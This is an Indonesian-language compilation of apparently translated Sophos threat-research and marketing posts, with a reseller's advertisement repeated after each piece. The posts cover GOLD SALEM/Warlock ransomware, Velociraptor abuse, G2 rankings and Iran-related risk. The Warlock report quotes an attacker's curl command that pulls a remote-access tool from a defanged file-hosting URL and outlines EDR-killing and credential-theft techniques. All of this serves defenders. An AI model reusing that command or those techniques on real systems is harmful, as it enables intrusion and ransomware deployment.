Author: hadi s

Operasi Warlock dari GOLD SALEM Bergabung ke Lanskap Ransomware yang Padat Kelompok baru ini menunjukkan kemampuan teknis yang matang dengan mengikuti pola operasi ransomware umum, namun juga menampilkan tanda-tanda kecerdikan tersendiri. Pemantauan Ancaman Peneliti dari Counter Threat Unit™ (CTU) saat ini memantau kelompok ancaman yang menamakan dirinya Warlock Group. CTU™ melacak kelompok ini dengan sebutan GOLD SALEM. Sejak Maret 2025, kelompok ini telah berhasil mengkompromikan jaringan dan menyebarkan ransomware Warlock mereka. Microsoft menyebut kelompok ini sebagai Storm-2603 dan menilai dengan “tingkat keyakinan moderat” bahwa kelompok ini berbasis di Tiongkok. Namun, peneliti CTU menyatakan bahwa tidak ada cukup bukti untuk mendukung atribusi tersebut. Korban dan Aktivitas Online Hingga pertengahan September 2025, GOLD SALEM telah mempublikasikan 60 korban, menempatkannya di tingkat menengah dibanding operasi ransomware lain pada periode yang sama. Korban GOLD SALEM berkisar dari entitas kecil komersial atau pemerintahan hingga perusahaan multinasional besar di Amerika Utara, Eropa, dan Amerika Selatan. Seperti kebanyakan kelompok ransomware lain, GOLD SALEM menghindari menyerang organisasi di Tiongkok dan Rusia, meskipun keduanya memiliki banyak target potensial. Namun, pada 8 September 2025, kelompok ini memposting nama korban berbasis di Rusia di situs kebocoran data khusus mereka (dedicated leak site / DLS). Korban tersebut adalah perusahaan komersial yang menyediakan layanan dan peralatan rekayasa untuk industri pembangkit listrik. Mengingat pemerintah Rusia dikenal menindak keras kelompok yang menyerang organisasi di wilayahnya, pencantuman korban asal Rusia oleh GOLD SALEM menunjukkan bahwa kelompok ini kemungkinan beroperasi dari luar yurisdiksi tersebut. Aktivitas Forum dan Jejak Awal GOLD SALEM tidak memiliki jejak publik hingga Juni 2025, ketika sebuah akun di forum bawah tanah RAMP yang mewakili kelompok ini memposting permintaan eksploitasi untuk aplikasi perusahaan umum (seperti Veeam, ESXi, SharePoint) dan alat untuk menonaktifkan EDR (Endpoint Detection and Response) serta produk keamanan lainnya. Posting berikutnya meminta kerja sama dengan broker akses awal (Initial Access Brokers/IAB) untuk mendapatkan calon korban. Belum jelas apakah kelompok ini mencari akses untuk melakukan serangan sendiri, merekrut afiliasi untuk membangun ransomware-as-a-service (RaaS) baru, atau keduanya. Infrastruktur Kebocoran Data GOLD SALEM mengoperasikan situs kebocoran berbasis Tor (DLS) untuk mempublikasikan nama korban dan data yang dicuri (lihat Gambar 1). Per 16 September 2025, data dari 19 dari 60 korban (32%) telah dipublikasikan di DLS. Selain itu, pelaku mengklaim telah menjual data dari 27 korban (45%) kepada pembeli pribadi, kemungkinan karena tebusan tidak dibayar. Kelompok kriminal siber kadang memang menjual data curian ke pihak ketiga, namun angka yang dipublikasikan oleh GOLD SALEM kemungkinan dilebih-lebihkan atau dipalsukan. Tiga nama korban yang sebelumnya terdaftar di DLS juga telah dihapus kemudian. Gambar 1: Situs kebocoran GOLD SALEM per 16 September 2025 Pola Aktivitas dan Waktu Publikasi GOLD SALEM juga memposting nama korban yang sebelumnya diserang oleh operasi ransomware lain. Meskipun jarang, hal ini dapat mengindikasikan bahwa: Broker akses menjual akses yang sama ke beberapa pelaku, Afiliasi memposting data curian di beberapa situs, atau Korban gagal menutup celah keamanan yang sama sehingga diserang berulang kali. Sebagai contoh, perusahaan konstruksi asal AS yang dilaporkan diserang pada Juni 2025 sebelumnya juga menjadi korban Hunters International (GOLD CRESCENT) pada Oktober 2024 dan Payout Kings pada Juni 2025. Data yang diterbitkan oleh GOLD SALEM serta metadata dari DLS mereka menunjukkan bahwa kelompok ini mulai melakukan serangan dan pemerasan sejak Maret 2025. Sebuah posting di forum RAMP pada 10 Juni 2025 mengumumkan ransomware Warlock dan menautkan ke versi pertama DLS berbasis Tor. Situs tersebut ditutup sehari kemudian (11 Juni) dan muncul kembali pada akhir Juli 2025. Kelompok ini cenderung mempublikasikan korban secara bertahap (batch), sehingga nama korban baru sering muncul beberapa hari hingga minggu setelah kompromi sebenarnya. Setiap entri korban disertai dengan tanggal “countdown” — tenggat waktu pembayaran tebusan sebelum data korban dipublikasikan (lihat Gambar 2). Biasanya tenggat ini 12–14 hari setelah nama korban muncul di DLS. Gambar 2: Tanggal batas waktu pembayaran tebusan di DLS GOLD SALEM per 16 September 2025 Insiden yang Diamati Pada akhir Juli 2025, peneliti CTU menganalisis sebuah insiden di mana GOLD SALEM menggunakan rantai eksploit ToolShell terhadap server SharePoint untuk mendapatkan akses awal. Eksploit ini menggabungkan beberapa kerentanan: CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, dan CVE-2025-53771. Eksploitasi tersebut menghasilkan pemasangan web shell ASPX yang membuat Process object untuk cmd.exe dalam konteks proses IIS (w3wp.exe), sehingga penyerang dapat mengeksekusi perintah jarak jauh dan melihat hasilnya secara langsung. CTU mengamati perintah berikut dieksekusi melalui web shell: curl -L -o c:\users\public\Sophos\Sophos-UI.exe hxxps[:]//filebin[.]net/j7jqfnh8tn4alzsr/wsocks.exe.txt File yang diunduh adalah server WebSockets berbasis Golang yang memungkinkan akses lanjutan ke server korban tanpa perlu web shell. Selain itu, GOLD SALEM juga menghindari deteksi EDR dengan menggunakan teknik Bring Your Own Vulnerable Driver (BYOVD) dan driver Baidu Antivirus yang rentan (diganti nama menjadi googleApiUtil64.sys) untuk menghentikan agen EDR. Kerentanan pada driver ini (CVE-2024-51324) memungkinkan penghentian proses arbitrer. Menurut profil Microsoft, kelompok ini juga menggunakan Mimikatz untuk menargetkan memori LSASS guna mengekstrak kredensial teks polos, serta menggunakan PsExec dan Impacket untuk pergerakan lateral, dan Group Policy Objects (GPO) untuk menyebarkan muatan ransomware Warlock. Pada Agustus 2025, CTU juga mengamati GOLD SALEM menyalahgunakan alat DFIR open-source Velociraptor untuk membuat tunnel jaringan Visual Studio Code di lingkungan korban. Beberapa insiden ini berakhir dengan penyebaran ransomware Warlock. Mitigasi dan Deteksi Organisasi disarankan untuk: Melakukan pemantauan permukaan serangan (attack surface monitoring) secara rutin. Menerapkan kebijakan patch agresif untuk layanan yang berhadapan langsung dengan internet. Melakukan pemantauan endpoint proaktif dan respons insiden cepat untuk mendeteksi eksploitasi zero-day. Proteksi Sophos yang mendeteksi aktivitas terkait ancaman ini meliputi: Troj/WebShel-F Troj/Warlock-B Untuk mengurangi risiko paparan, peneliti CTU merekomendasikan agar pelanggan menggunakan kontrol keamanan yang tersedia untuk meninjau dan membatasi akses berdasarkan indikator berikut: Indikator Tipe Konteks bfbeac96a385b1e5643ec0752b132506 MD5 hash ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell de25be0afd53a1d274eec02e5303622fc8e7dbd5 SHA1 hash ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell 996c7bcec3c12c3462220fc2c19d61ccc039005ef5e7c8fabc0b34631a31abb1 SHA256 hash ASPX web shell digunakan oleh GOLD SALEM setelah eksploitasi SharePoint ToolShell b3a099ecca79503a0e4a154bd85d3e6b MD5 hash Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM 6d0cc6349a951f0b52394ad3436d1656ec5fba6a SHA1 hash Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM a204a48496b54bcb7ae171ad435997b92eb746b5718f166b3515736ee34a65b4 SHA256 hash Alat akses jarak jauh WebSockets (wsocks.exe.txt) digunakan oleh GOLD SALEM Tabel 1: Indikator untuk ancaman GOLD SALEM Infrastruktur IT yang kuat…

Sophos Mendukung Objective-See Foundation untuk Meningkatkan Keamanan macOS dan Pendidikan Keamanan Siber yang Inklusif Didedikasikan untuk membangun komunitas keamanan Apple yang lebih kuat dan inklusif melalui alat keamanan sumber terbuka Sophos bangga menjadi “gold friend” dari Objective-See Foundation, mendukung misinya untuk memperluas akses pendidikan keamanan siber dan mendorong riset keamanan macOS inovatif yang digerakkan oleh komunitas. Seiring macOS menjadi target utama para pelaku kejahatan siber, organisasi seperti Objective-See sangat penting untuk membantu komunitas keamanan tetap selangkah lebih maju. Dalam tiga tahun terakhir, pangsa pasar perangkat macOS yang menjadi target kejahatan siber meningkat lebih dari 60%, dan harga alat seperti Atomic macOS Stealer (AMOS) meningkat tiga kali lipat pada tahun 2024 — sebuah tanda jelas bahwa perangkat Apple tidak lagi luput dari perhatian. Foundation ini berkomitmen menciptakan alat gratis dan sumber terbuka untuk macOS serta mempromosikan pendidikan dan inklusivitas dalam keamanan siber. Sophos merasa terhormat dapat mendukung misi ini, menegaskan komitmen kami terhadap inovasi berbasis pencegahan dan komunitas. Kontribusi kami berdampak langsung pada inisiatif inti organisasi: Objective by the Sea (#OBTS), satu-satunya konferensi keamanan khusus Apple di dunia yang mempertemukan para peneliti keamanan Apple terbaik. Persentase pembicara perempuan di #OBTS meningkat dari 10% pada tahun pertama menjadi lebih dari 30% pada edisi kedelapan — bukti nyata dampak Foundation. Objective for the We (#OFTW), acara inklusi dan komunitas dari Objective-See yang menyediakan pelatihan gratis, diskusi, sesi tanya jawab (AMA), dan jalur masuk ke keamanan Apple bagi para pelajar. Melalui #OFTW, lebih dari 310 pelajar telah menerima pelatihan, dengan lebih dari 400 aplikasi hingga saat ini. Beasiswa: memberikan kesempatan bagi pelajar—terutama perempuan dan kelompok yang kurang terwakili—untuk mengejar gelar keamanan siber dan menjadi generasi pembela berikutnya. Dalam empat edisi terakhir #OBTS, organisasi nirlaba ini telah memberikan beasiswa penuh (meliputi tiket pesawat, penginapan, pelatihan, dan tiket konferensi) kepada 29 pelajar—19 di antaranya perempuan—untuk menghadiri Objective for the We. Tiga penerima beasiswa tersebut kemudian menjadi pembicara di konferensi. “Dengan mendorong keberagaman, mendukung generasi muda, dan menginspirasi lebih banyak perempuan untuk memasuki dunia keamanan siber, Objective-See membentuk masa depan industri kami. Sophos bangga mendukung kerja penting ini, yang sejalan dengan komitmen kami terhadap inovasi inklusif dan pengembangan riset keamanan macOS,” kata Simon Reed, Chief Research Officer Sophos. Dengan mendukung Objective-See dalam misinya, Sophos menegaskan keyakinan bahwa kolaborasi terbuka dan investasi komunitas adalah kunci untuk tetap selangkah lebih maju dari ancaman yang terus berkembang — serta memastikan semua orang dapat berperan dalam membentuk masa depan keamanan siber. “Kami sangat berterima kasih atas dukungan besar dari Sophos, yang memungkinkan kami memperluas inisiatif ini, menjangkau lebih banyak orang di seluruh dunia, dan terus membangun komunitas keamanan Apple yang lebih kuat dan beragam,” ujar Patrick Wardle, pendiri Objective-See. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!

Ketika orang bertanya kepada kami, “Bukankah semua solusi endpoint sekarang sama saja?” — jawaban kami sederhana: Tidak. Mereka tidak sama. Jika Anda sedang mengevaluasi perlindungan endpoint, kemungkinan Anda sudah menyadari sesuatu: Semua terdengar serupa. “Didukung AI.” “Generasi berikutnya.” “Terintegrasi.” Klaim-klaim ini ada di mana-mana. Dan dengan lebih dari 90% organisasi sekarang menggunakan beberapa bentuk perlindungan endpoint selain antivirus, mudah untuk berasumsi bahwa semua solusi itu sama. Tapi itu tidak benar. Asumsi ini cepat runtuh ketika organisasi berkembang — bergerak dari pencegahan dasar ke deteksi dan respons. Dalam evolusi ini, yang tadinya terlihat seperti aktivitas sekadar centang kotak menjadi keputusan arsitektur yang krusial. Apa yang Anda pilih sekarang memengaruhi tidak hanya seberapa baik Anda terlindungi, tetapi juga seberapa baik Anda dapat beradaptasi dan mengurangi risiko bisnis secara keseluruhan menghadapi ancaman yang terus berkembang. Jadi, bagaimana cara membedakan sinyal dari kebisingan? Kekuatan di Balik Platform Salah satu indikator terbaik dari apa yang dapat dilakukan solusi perlindungan untuk Anda — bukan hanya hari ini, tetapi jangka panjang — adalah platform tempat solusi tersebut dibangun. Tidak semua fitur mungkin penting bagi Anda di hari pertama, dan itu tidak apa-apa. Yang penting adalah apakah fondasi tersebut memberi Anda ruang untuk berkembang dan meningkatkan pertahanan siber Anda. Di sinilah pemikiran platform menjadi sangat penting: Apakah Anda memilih produk atau berinvestasi dalam strategi? Perlindungan endpoint modern bukan hanya soal apa yang terpasang di perangkat. Ini tentang data telemetri yang dikumpulkan, integrasi yang didukung, alur kerja yang diaktifkan, dan jalur data di balik semuanya. Terutama ketika AI semakin berperan dalam deteksi dan respons ancaman, kecanggihan infrastruktur data dasar tersebut menjadi pengganda kekuatan. Semua Dimulai dari Data Sebelum AI dapat membantu — apalagi mengotomatiskan — Anda membutuhkan data berkualitas tinggi, terstruktur dengan baik, dan terus diperbarui. Ini bukan pemikiran baru. Faktanya, ilmu data telah lama mengandalkan empat dimensi dasar: Volume, Variasi, Kecepatan, dan Kebenaran (Veracity). Mari kita terapkan itu pada perlindungan endpoint: Volume: Seberapa banyak telemetri yang dikumpulkan? Apakah Anda melihat perilaku nyata dari musuh secara global — bukan hanya malware, tetapi serangan yang dilakukan langsung, penyalahgunaan alat, dan metode penyamaran yang tersembunyi? Variasi: Apakah platform hanya melihat endpoint, atau juga mengambil data dari email, jaringan, cloud, identitas, dan lainnya? Apakah data berasal dari beragam pelanggan di berbagai wilayah, sektor, dan tingkat kematangan? Lebih banyak sumber berarti visibilitas lebih baik — dan konteks lebih kaya. Kecepatan: Seberapa cepat telemetri itu tiba, dan seberapa sering diperbarui? Apakah model Anda belajar dari ancaman baru dalam hitungan jam atau hari, atau Anda bergantung pada pembaruan tanda tangan mingguan? Kebenaran: Bisakah Anda mempercayai data itu? Apakah data diperkaya dengan intelijen ancaman dan diverifikasi melalui respons insiden nyata? Apakah deteksi didukung oleh penelitian, bukan hanya otomatisasi? Detail jawaban atas pertanyaan ini yang membedakan satu platform dengan yang lain. Dan ini menentukan apakah solusi dapat mendeteksi ancaman baru sebelum menjadi masalah industri luas, atau justru tertinggal. Mulai dengan Pencegahan. Berkembang ke Ketahanan. Endpoint sering kali menjadi peluang pertama — dan terbaik — untuk menghentikan serangan. Tapi jika arsitektur Anda memungkinkan, Anda dapat memperluas pencegahan itu ke email, jaringan, cloud, dan identitas. Dari situ, Anda bisa membangun kemampuan respons di seluruh permukaan serangan, memperkuat kemampuan Anda untuk mengendalikan ancaman dengan cepat dan menjaga sistem inti tetap berjalan saat ada yang lolos. Setiap langkah maju memperbesar keuntungan Anda. Anda mengurangi risiko bisnis, memperbaiki waktu deteksi, dan mempercepat respons. Dan jika Anda tidak memiliki sumber daya manusia untuk mengelola semuanya secara internal, Anda dapat mengandalkan mitra yang menawarkan layanan deteksi dan respons terkelola 24/7 (MDR) yang langsung terhubung ke platform Anda. Di Sophos, Ini Bukan Sekadar Teori Aktivitas Harian di Sophos Central Kami melindungi lebih dari 600.000 organisasi di seluruh dunia. Platform kami, Sophos Central, memproses lebih dari 223 Terabyte telemetri ancaman setiap hari, yang diambil dari setiap wilayah, sektor, dan permukaan serangan. Kami melihat ancaman lebih awal dan sering, menghasilkan lebih dari 34 juta deteksi setiap hari, memberikan keunggulan bagi para penangkal ancaman kami. Dan di balik data itu ada Sophos X-Ops, tim global analis ancaman, peneliti malware, dan spesialis respons yang memantau ratusan kelompok ancaman dan ribuan kampanye secara real time. Bersama-sama, intelijen dan keahlian yang dibangun di Sophos Central menghentikan rata-rata 11 juta serangan setiap hari, dengan 231 ancaman canggih diselesaikan oleh tim Managed Detection and Response kami. Secara kolektif, kami menjaga pelanggan tetap aman dan bisnis berjalan tanpa gangguan. Ketika orang bertanya kepada kami, “Bukankah semua solusi endpoint sekarang sama saja?” — jawaban kami sederhana: Tidak. Mereka tidak sama. Lihat lebih jauh dari kata-kata keren. Tanyakan apa yang dilihat platform, seberapa cepat ia belajar, dan siapa yang memvalidasi wawasan tersebut. Kebenarannya adalah, apa yang menggerakkan perlindungan sama pentingnya dengan perlindungan itu sendiri. Dan mereka yang memiliki data terbaik akan selalu selangkah lebih maju. Pada akhirnya, keamanan siber yang kuat bukan hanya kebutuhan teknis. Ini adalah keharusan bisnis yang melindungi operasi, reputasi, dan nilai jangka panjang. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!

Sophos Puncaki Laporan G2 Fall 2025: Peringkat #1 Secara Keseluruhan dalam MDR dan Firewall Peringkat #1 dalam 47 Laporan Global G2 telah merilis Laporan Fall 2025, dan para pelanggan sekali lagi menempatkan Sophos di posisi teratas. Sophos meraih peringkat #1 secara keseluruhan dalam kategori Managed Detection and Response (MDR) dan #1 secara keseluruhan dalam perangkat lunak Firewall. Menunjukkan kekuatan platform kami, Sophos dinobatkan sebagai Pemimpin (Leader) untuk ke-13 kalinya secara berturut-turut di setiap G2 Overall Grid® yang mendefinisikan operasi keamanan modern: Endpoint Protection Platforms Endpoint Detection and Response (EDR) Extended Detection and Response (XDR) Firewall Software Managed Detection and Response (MDR) Pengakuan ini berasal dari ulasan rekan kerja yang telah diverifikasi dan mencerminkan apa yang paling dihargai oleh tim keamanan: Waktu pencapaian hasil yang lebih cepat Operasi yang lebih sederhana Keyakinan pada platform yang mampu berkembang dari pencegahan hingga respons yang dikelola Managed Detection and Response (MDR) Selain meraih peringkat #1 secara keseluruhan di antara solusi MDR, Sophos MDR juga dinilai sebagai solusi terbaik dalam lima segmen laporan, termasuk dalam Enterprise dan Mid-Market Grids. Sophos MDR juga meraih penghargaan Best Results dan Best Usability di kalangan pelanggan Enterprise. Endpoint Sophos EDR/XDR dinobatkan sebagai Pemimpin dalam delapan segmen berbeda pada Laporan Fall 2025, termasuk dalam Overall, Enterprise, Mid-Market, dan Small Business Grids. Platform Sophos XDR meraih penghargaan: Best Usability Best Results Best Relationship yang semakin mengukuhkan posisi unggulannya dalam hasil keamanan industri. Firewall Laporan G2 Fall 2025 menandai peringkat #1 keseluruhan ke-11 secara berturut-turut untuk Sophos Firewall. Dan untuk pertama kalinya, Sophos Firewall dinilai sebagai solusi firewall #1 oleh semua segmen pelanggan (Enterprise, Mid-Market, dan Small Business). Selain itu, Sophos Firewall meraih penghargaan: Overall Best Results Best Usability Best Relationship Apa Kata Pelanggan Sophos “Tingkat kenyamanan dan keamanan yang diberikan Sophos MDR kepada kami tidak bisa diukur.” — Lead Infrastructure Engineer, segmen Mid-Market “[Sophos MDR] adalah kombinasi otomatisasi yang kuat dan keahlian manusia nyata yang disampaikan melalui ekosistem keamanan yang terintegrasi secara erat.” — Pengguna di segmen Enterprise “Sophos Firewall menonjol karena menggabungkan perlindungan yang kuat dengan antarmuka yang mudah digunakan.” — Technical Support Engineer, segmen Small Business “[Sophos Firewall] menawarkan rangkaian fitur yang kuat, termasuk perlindungan ancaman lanjutan, pelaporan yang mudah dipahami, dan integrasi yang mulus dengan keamanan endpoint.” — Manager, segmen Mid-Market “Yang paling saya sukai dari Sophos Endpoint adalah kemampuannya memberikan perlindungan yang kuat namun tetap mudah dikelola dan hampir tidak terlihat oleh pengguna akhir.” — Technical Engineer, segmen Small Business “Dengan deteksi ancaman canggih yang didukung oleh deep learning dan analisis perilaku, [Sophos Endpoint] dengan cepat mengidentifikasi dan menetralkan bahkan ancaman paling canggih sekalipun.” — IT Manager, segmen Mid-Market Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!  

Pendekatan ini menunjukkan evolusi dari para pelaku ancaman yang menyalahgunakan alat pemantauan dan manajemen jarak jauh. Ditulis oleh Tim Riset Sophos Counter Threat Unit 26 Agustus 2025 Penelitian Ancaman | Alat Serangan | Akses Jarak Jauh | Velociraptor | Visual Studio Code Pada Agustus 2025, peneliti Counter Threat Unit™ (CTU) menyelidiki sebuah insiden intrusi yang melibatkan penggunaan alat digital forensik dan respons insiden (DFIR) Velociraptor yang bersifat open-source dan sah. Dalam insiden ini, pelaku ancaman menggunakan alat tersebut untuk mengunduh dan menjalankan Visual Studio Code dengan kemungkinan tujuan membuat terowongan ke server command and control (C2) yang dikendalikan penyerang. Mengaktifkan opsi terowongan di Visual Studio Code memicu peringatan dari Taegis™, karena opsi ini memungkinkan akses jarak jauh dan eksekusi kode jarak jauh, yang telah disalahgunakan oleh beberapa kelompok ancaman sebelumnya. Pelaku menggunakan utilitas Windows msiexec untuk mengunduh installer (v2.msi) dari domain Cloudflare Workers (files[.]qaubctgg[.]workers[.]dev). Lokasi ini tampaknya merupakan folder staging untuk alat-alat penyerang, termasuk alat tunneling Cloudflare dan alat administrasi jarak jauh Radmin. File ini menginstal Velociraptor yang dikonfigurasi untuk berkomunikasi dengan server C2 velo[.]qaubctgg[.]workers[.]dev. Pelaku kemudian menggunakan perintah PowerShell yang dienkode untuk mengunduh Visual Studio Code (code.exe) dari folder staging yang sama dan menjalankannya dengan opsi terowongan aktif. Pelaku menginstal code.exe sebagai layanan dan mengarahkan outputnya ke file log. Selanjutnya, mereka kembali menggunakan utilitas msiexec Windows untuk mengunduh malware tambahan (sc.msi) dari folder workers[.]dev (lihat Gambar 1). Velociraptor membuat terowongan Visual Studio Code Gambar 1: Pohon proses yang menunjukkan Velociraptor membuat terowongan Visual Studio Code. Aktivitas tunneling Visual Studio Code memicu peringatan Taegis yang menyebabkan investigasi oleh Sophos. Analis memberikan saran mitigasi yang memungkinkan pelanggan segera mengambil tindakan perbaikan seperti mengisolasi host yang terinfeksi, yang mencegah pelaku mencapai tujuannya. Analisis menunjukkan bahwa aktivitas jahat ini kemungkinan besar akan berujung pada penyebaran ransomware. Pelaku ancaman sering menyalahgunakan alat pemantauan dan manajemen jarak jauh (RMM). Kadang-kadang mereka memanfaatkan alat yang sudah ada di sistem target, dan di lain waktu mereka menginstal alat tersebut selama serangan. Insiden Velociraptor ini mengungkap bahwa penyerang mulai menggunakan alat respons insiden untuk mendapatkan pijakan dalam jaringan sekaligus meminimalkan jumlah malware yang mereka sebarkan. Organisasi disarankan untuk memantau dan menyelidiki penggunaan Velociraptor yang tidak sah, dan menganggap temuan penggunaan alat ini sebagai tanda awal potensi serangan ransomware. Mengimplementasikan sistem deteksi dan respons endpoint, memantau alat tak terduga dan perilaku mencurigakan, serta mengikuti praktik terbaik untuk mengamankan sistem dan melakukan pencadangan, dapat membantu mengurangi risiko serangan ransomware. Dampak serangan dapat sangat diminimalkan jika terdeteksi sebelum ransomware dijalankan. Proteksi Sophos berikut mendeteksi aktivitas terkait ancaman ini: Troj/Agent-BLMR Troj/BatDl-PL Troj/Mdrop-KDK Untuk mengurangi risiko dari malware ini, peneliti CTU™ menyarankan organisasi menggunakan kontrol yang tersedia untuk meninjau dan membatasi akses menggunakan indikator yang tercantum di Tabel 1. Domain-domain tersebut dapat berisi konten berbahaya, sehingga pertimbangkan risikonya sebelum membukanya di browser. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!

Edisi laporan dua bulanan dari Counter Threat Unit™ (CTU) ini membahas pembaruan penting dalam lanskap ancaman yang terjadi selama Mei dan Juni 2025. Tim riset CTU™ menganalisis berbagai ancaman keamanan untuk membantu organisasi melindungi sistem mereka. Berdasarkan pengamatan selama bulan Mei dan Juni, para peneliti CTU™ mengidentifikasi beberapa isu penting dan perubahan dalam lanskap ancaman global: Poin Penting: Penyeragaman penamaan kelompok ancaman menimbulkan tantangan Iran mengancam akan membalas terhadap AS Penegak hukum gunakan ejekan sebagai taktik Tantangan dalam Penyeragaman Penamaan Kelompok Ancaman Menyelaraskan konvensi penamaan kelompok ancaman dari berbagai pihak merupakan tugas yang sangat kompleks. Sejak tahun 2020, Secureworks telah mempublikasikan “Rosetta Stone” — referensi dinamis dan komprehensif untuk menyamakan nama-nama kelompok ancaman dari berbagai vendor. Penamaan kelompok ancaman bertujuan untuk membantu para profesional keamanan dengan cepat mengidentifikasi pola serangan tertentu, menghubungkan aktivitas terdahulu dengan insiden saat ini. Informasi ini memberikan wawasan tentang kapabilitas dan niat pelaku ancaman, mendukung pengambilan keputusan saat merespons, membantu atribusi, dan mendukung pemodelan risiko yang lebih akurat. Perbedaan dalam penamaan kelompok ancaman bukan sekadar karena vendor ingin menciptakan “merek” sendiri, tetapi juga karena penamaan tersebut berdasarkan pada pengamatan masing-masing vendor yang bisa berbeda-beda. Jika dua vendor mengamati aktivitas yang sama, pemetaan nama dimungkinkan — tapi itu tidak selalu sederhana. Pada awal Juni, Microsoft dan CrowdStrike mengumumkan upaya penyelarasan konvensi penamaan kelompok ancaman mereka. Langkah seperti ini menguntungkan komunitas keamanan. Secureworks telah memimpin sejak 2020 dengan mempublikasikan profil kelompok ancaman yang dilengkapi dengan pemetaan terhadap nama dari vendor lain. Saat ini, peneliti CTU sedang bekerja untuk menyelaraskan nama kelompok ancaman dari Secureworks dengan klasifikasi aktivitas ancaman milik Sophos. Menjaga akurasi pemetaan satu-ke-satu sangat menantang karena kelompok ancaman dapat bekerja sama atau mengubah taktik, teknik, prosedur (TTP), serta tujuan mereka — begitu juga dengan cakupan pengamatan dari vendor yang bisa berubah. Meski begitu, pengumuman Microsoft dan CrowdStrike menunjukkan bahwa ini adalah awal dari upaya penyeragaman yang lebih luas. Upaya ini tidak mudah, terutama karena perlu melindungi telemetri dan kekayaan intelektual masing-masing vendor. Meskipun begitu, penyelarasan oleh analis keamanan sangat diperlukan. Belum jelas vendor mana lagi yang akan bergabung. Microsoft menyebut Google/Mandiant dan Unit 42 Palo Alto Networks, namun CrowdStrike tidak. Microsoft juga menyertakan daftar awal nama kelompok ancaman dari berbagai vendor, termasuk dari Secureworks. ✅ Langkah yang Harus Diambil Selanjutnya: Gunakan profil kelompok ancaman dari Secureworks saat membaca intelijen ancaman untuk mendapatkan pemahaman yang lebih luas tentang tugas dan TTP masing-masing kelompok. Iran Mengancam Akan Membalas Terhadap AS Dukungan Amerika Serikat terhadap serangan Israel ke Iran dapat meningkatkan risiko serangan lanjutan oleh aktor ancaman yang didukung Iran terhadap kepentingan AS. Sekitar satu minggu setelah Israel melancarkan serangan militer ke fasilitas nuklir dan militer Iran pada Juni 2025, AS melakukan serangan udara terbatas terhadap program nuklir Iran. Meskipun serangan tersebut bersifat terbatas dan dibalas Iran dengan peluncuran misil ke pangkalan AS di Qatar, pemerintah Iran mengumumkan niat untuk melakukan pembalasan lebih lanjut terhadap kepentingan AS. Serangan Israel dan pembunuhan terhadap pemimpin militer dan ilmuwan Iran menandai eskalasi baru dalam konflik panjang selama puluhan tahun. Konflik ini telah melibatkan perang proksi selama bertahun-tahun, di mana Iran menyediakan senjata dan pelatihan kepada kelompok seperti Hezbollah, Houthi, dan Hamas untuk menyerang Israel. Selain itu, terdapat pula perang siber yang terus berlangsung antara kedua negara. AS juga telah menjadi sasaran serangan siber dan operasi pengaruh oleh Iran. Masih belum jelas bentuk pembalasan seperti apa yang akan dilakukan dan kapan. Sebagai contoh, setelah serangan drone AS pada Januari 2020 yang menewaskan jenderal IRGC Quds Force, Iran mengancam balasan dan meluncurkan misil ke pangkalan AS di Irak, tetapi tidak melakukan serangan siber besar seperti yang dikhawatirkan. Badan Keamanan Siber dan Infrastruktur AS (CISA) bersama lembaga mitra telah merilis lembar informasi mengenai kemungkinan bentuk pembalasan siber oleh Iran. Aktor ancaman yang didukung atau pro-Iran telah dikaitkan dengan: Perusakan situs (defacement) Malware penghancur data (wiper) Ransomware Serangan DDoS Publikasi tersebut secara khusus menyoroti risiko terhadap perusahaan-perusahaan di sektor pertahanan (Defense Industrial Base / DIB), terutama yang memiliki keterkaitan dengan Israel. Risiko ini juga berdampak pada organisasi di Timur Tengah yang dianggap Iran mendukung kepentingan AS dan Israel. Fakta ini juga menyebut kampanye terdahulu oleh hacktivist pro-Iran yang menargetkan fasilitas di AS dan negara lain yang menggunakan teknologi operasional buatan Israel, seperti programmable logic controllers (PLCs). Iran semakin sering menggunakan persona hacktivist palsu, seperti Cyber Av3ngers, untuk menyamarkan keterlibatan pemerintah dalam serangan-serangan tersebut. ✅ Rekomendasi: Organisasi yang mungkin menjadi sasaran pembalasan Iran harus meningkatkan kewaspadaan dan memastikan pertahanan siber yang memadai telah diterapkan. Saran ini berlaku baik untuk entitas di AS maupun di Timur Tengah yang mungkin dianggap Iran sebagai pendukung kepentingan AS dan Israel. Infrastruktur IT yang kuat adalah kunci produktivitas perusahaan. Dengan qfirewall indonesia, Anda bisa mendapatkan solusi IT lengkap yang sesuai dengan kebutuhan Anda. iLogo Indonesia sebagai mitra terpercaya siap mengintegrasikan semuanya agar bisnis Anda tetap berjalan lancar dan aman. Hubungi kami sekarang atau kunjungi qfirewall.id untuk informasi lebih lanjut!

